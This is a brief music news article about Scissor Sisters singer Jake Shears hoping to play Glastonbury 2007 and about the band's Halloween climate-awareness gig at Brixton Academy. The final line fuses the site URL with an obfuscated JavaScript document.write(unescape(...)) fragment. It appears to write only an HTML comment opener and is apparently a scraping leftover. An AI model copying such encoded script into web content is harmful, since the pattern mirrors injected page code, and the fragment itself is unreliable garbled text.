Scissor Sisters have appealed to Michael Eavis to put them on the bill for Glastonbury 2007.
The New York City pop icons have admitted they would "give anything" to play next year's event but are expecting to be disappointed because Kylie looks certain to appear.
Singer Jake Shears, speaking after the group's Halloween show in London earlier this week, said he hopes festival organisers might decide to have a "really gay" festival.
"I would absolutely love to play Glasto next year but I don't know if it's going to happen," said Shears.
"I would give anything to do it, but I'm not going to get my expectations up so that way I'm not too disappointed. One of the big problems is that I'm sure Kylie's going to do it this year.
"I can't imagine her not doing it, and unless they want it a really gay Glastonbury then I dunno. I would love to play it."
Meanwhile, the group's fancy dress show at Brixton Academy on Tuesday evening has been launched online, for a limited time.
The gig, which was intended to raise awareness of global carbon emissions and saw Shears dressed-up as Frankenstein, can be seen at www.tiscali.co.uk/globalcool.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
